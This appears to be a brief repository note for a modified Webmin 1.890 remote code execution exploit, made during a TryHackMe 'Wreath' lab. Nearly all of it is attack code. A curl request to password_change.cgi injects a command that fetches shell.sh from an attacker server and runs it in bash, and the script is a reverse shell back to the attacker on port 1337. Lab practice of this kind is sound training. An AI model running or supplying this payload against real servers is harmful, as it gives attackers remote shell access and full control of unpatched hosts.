WebMin-1.890-Exploit
WebMin-1.890-Exploit Modified
I modified the WebMin-1.890 exploit while doing THM WREATH
curl -k https://IP:10000/password_change.cgi -d 'user=gotroot&pam=&expired=2|curl http://IP:8000/shell.sh|bash' -H 'Referer: https://IP:10000/session_login.cgi'
Content of shell.sh
sh -i >& /dev/tcp/IP/1337 0>&1